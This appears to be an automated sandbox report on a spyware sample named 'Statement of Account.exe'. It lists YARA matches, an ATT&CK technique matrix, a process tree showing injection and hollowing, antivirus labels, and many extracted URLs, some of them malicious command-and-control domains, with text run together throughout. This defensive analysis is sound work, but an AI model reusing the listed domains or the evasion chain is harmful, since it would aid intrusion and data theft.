          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Mitre Att&ck Matrix (a number before a technique is the signature-count badge shown in the report; techniques without a number had no hits)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Scheduled Task/Job; 1 Shared Modules; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: 712 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 712 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 321 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Connections Discovery; 2 System Network Configuration Discovery; 1 File and Directory Discovery; 212 System Information Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          Behavior Graph ID: 1543876, Sample: Statement of Account.exe, Start date: 28/10/2024, Architecture: WINDOWS, Score: 100
          Contacted hosts: www.yzq0n.top; www.urgaslotvip.website; 9 other IPs or domains
          Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

          Process tree (as drawn in the behavior graph):
          Statement of Account.exe (started)
            Dropped: C:\Users\user\AppData\Roaming\SIZfuXT.exe (PE32); C:\Users\user\...\SIZfuXT.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpC2DD.tmp (XML); C:\Users\...\Statement of Account.exe.log (ASCII)
            Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
            vbc.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
              explorer.exe (injected)
                Network: www.irex.info 85.13.166.18, 49980, 80, NMM-ASD-02742FriedersdorfHauptstrasse68DE Germany
                Signatures: Uses netstat to query active network connections and open ports; Uses ipconfig to lookup or modify the Windows network settings
                NETSTAT.EXE (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                  cmd.exe (started)
                    conhost.exe (started)
                ipconfig.exe (started)
                autochk.exe (started)
            powershell.exe (started)
              Signatures: Loading BitLocker PowerShell Module
              WmiPrvSE.exe (started)
              conhost.exe (started)
            schtasks.exe (started)
              conhost.exe (started)
          SIZfuXT.exe (started)
            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
            vbc.exe (started)
            schtasks.exe (started)
              conhost.exe (started)

          Source | Detection | Scanner | Label
          Statement of Account.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
          Statement of Account.exe | 100% | Avira | TR/AD.Swotter.zvmla
          Statement of Account.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\SIZfuXT.exe | 100% | Avira | TR/AD.Swotter.zvmla
          C:\Users\user\AppData\Roaming\SIZfuXT.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\SIZfuXT.exe | 76% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
          No Antivirus matches
          No Antivirus matches
          Name | Malicious | Antivirus Detection | Reputation
          www.f6b-crxy.top/cu29/ | true | | unknown
          http://www.irex.info/cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT | true | | unknown
                                                      unknown
                                                      http://www.sajatypeworks.comStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cn/cTheStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.usinessaviationconsulting.netexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.ental-bridges-87553.bondexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.ohns.appexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sed-cars-89003.bond/cu29/explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.sed-cars-89003.bondReferer:explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000007.00000000.1754971780.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107482777.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.leachlondonstore.onlineReferer:explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStatement of Account.exe, 00000000.00000002.1730151288.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, SIZfuXT.exe, 00000008.00000002.1767337995.00000000032B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.hopp9.topexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.ohns.app/cu29/www.achhonglan.shopexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://wns.windows.com/Lexplorer.exe, 00000007.00000002.4174329617.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.azino-forum-pro.online/cu29/www.sed-cars-89003.bondexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.irex.infoexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://word.office.comexplorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.ohns.app/cu29/explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.sed-cars-89003.bond/cu29/www.kdsclci.bondexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://www.ental-bridges-87553.bond/cu29/.explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.nd-los.netReferer:explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.srtio.xyz/cu29/www.eb777.clubexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.achhonglan.shop/cu29/www.usinessaviationconsulting.netexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.carterandcone.comlStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers/frere-user.htmlStatement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ental-bridges-87553.bond/cu29/explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.azino-forum-pro.online/cu29/explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.azino-forum-pro.onlineReferer:explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.ohns.appReferer:explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://www.leachlondonstore.online/cu29/www.f6b-crxy.topexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://outlook.com_explorer.exe, 00000007.00000003.3106429388.000000000C5E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4174883192.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.f6b-crxy.top/cu29/explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.yzq0n.top/cu29/www.srtio.xyzexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.sed-cars-89003.bondexplorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
